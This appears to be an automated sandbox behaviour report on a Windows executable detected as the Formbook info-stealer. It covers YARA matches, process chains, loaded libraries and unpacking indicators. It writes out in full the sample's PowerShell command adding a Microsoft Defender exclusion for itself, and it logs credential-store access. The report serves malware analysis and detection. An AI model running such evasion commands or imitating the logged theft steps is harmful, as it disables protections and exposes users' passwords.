            Source: Scan 00093847.exe, 00000003.00000002.2069726961.0000000000BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSETUPUGC.EXEj% vs Scan 00093847.exe
            Source: Scan 00093847.exeBinary or memory string: OriginalFilenameWYNp.exe< vs Scan 00093847.exe
            Source: Scan 00093847.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.Scan 00093847.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.Scan 00093847.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Scan 00093847.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, TnkgYbd3tme2aO7aiW.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, TnkgYbd3tme2aO7aiW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, TnkgYbd3tme2aO7aiW.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, TnkgYbd3tme2aO7aiW.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, TnkgYbd3tme2aO7aiW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, TnkgYbd3tme2aO7aiW.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, yCd6TKQ6QdRmG1No7E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, TnkgYbd3tme2aO7aiW.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, TnkgYbd3tme2aO7aiW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, TnkgYbd3tme2aO7aiW.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, yCd6TKQ6QdRmG1No7E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, yCd6TKQ6QdRmG1No7E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@13/9
            Source: C:\Users\user\Desktop\Scan 00093847.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan 00093847.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Scan 00093847.exeMutant created: \Sessions\1\BaseNamedObjects\UirBkCWmvYxPzFUFUixVIwoLPH
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkrtf5ih.3yq.ps1Jump to behavior
            Source: Scan 00093847.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Scan 00093847.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\Scan 00093847.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: setupugc.exe, 00000009.00000002.3552722555.0000000003609000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2248883137.0000000003609000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: unknownProcess created: C:\Users\user\Desktop\Scan 00093847.exe "C:\Users\user\Desktop\Scan 00093847.exe"
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe"
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess created: C:\Users\user\Desktop\Scan 00093847.exe "C:\Users\user\Desktop\Scan 00093847.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess created: C:\Users\user\Desktop\Scan 00093847.exe "C:\Users\user\Desktop\Scan 00093847.exe"Jump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Scan 00093847.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Scan 00093847.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Scan 00093847.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Scan 00093847.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: WYNp.pdbSHA256 source: Scan 00093847.exe
            Source: Binary string: setupugc.pdb source: Scan 00093847.exe, 00000003.00000002.2069726961.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000002.3553025155.0000000001088000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uspEUeZyrqFDmi.exe, 00000008.00000000.1983763767.0000000000ADE000.00000002.00000001.01000000.0000000C.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553078473.0000000000ADE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Scan 00093847.exe, 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2069789007.00000000037F2000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2071753263.00000000039A3000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: WYNp.pdb source: Scan 00093847.exe
            Source: Binary string: wntdll.pdb source: Scan 00093847.exe, Scan 00093847.exe, 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2069789007.00000000037F2000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2071753263.00000000039A3000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: Scan 00093847.exe, 00000003.00000002.2069726961.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000002.3553025155.0000000001088000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, TnkgYbd3tme2aO7aiW.cs.Net Code: NfQZ3e8SES System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, TnkgYbd3tme2aO7aiW.cs.Net Code: NfQZ3e8SES System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Scan 00093847.exe.3057a30.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, TnkgYbd3tme2aO7aiW.cs.Net Code: NfQZ3e8SES System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Scan 00093847.exe.7590000.3.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: Scan 00093847.exeStatic PE information: 0x97CE3D1D [Thu Sep 15 17:27:57 2050 UTC]
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_07A7247A push ecx; retf 0_2_07A7247B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0041A857 push DD2CA9E8h; retf 3_2_0041A85D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0040D20D push esp; ret 3_2_0040D258
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_004032C0 push eax; ret 3_2_004032C2
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0040ABA3 push esi; ret 3_2_0040ABA4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_00408433 push eax; iretd 3_2_00408434
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_00417D95 push ds; ret 3_2_00417D97
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_00418EE1 pushfd ; ret 3_2_00418F06
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0041A68C push 00000063h; retf 3_2_0041A68E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010809AD push ecx; mov dword ptr [esp], ecx3_2_010809B6
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_043324F6 push 00000063h; retf 8_2_043324F8
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_04330D4B pushfd ; ret 8_2_04330D70
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_0432D617 push ebx; retf 8_2_0432D618
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_043326C1 push DD2CA9E8h; retf 8_2_043326C7
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_04325077 push esp; ret 8_2_043250C2
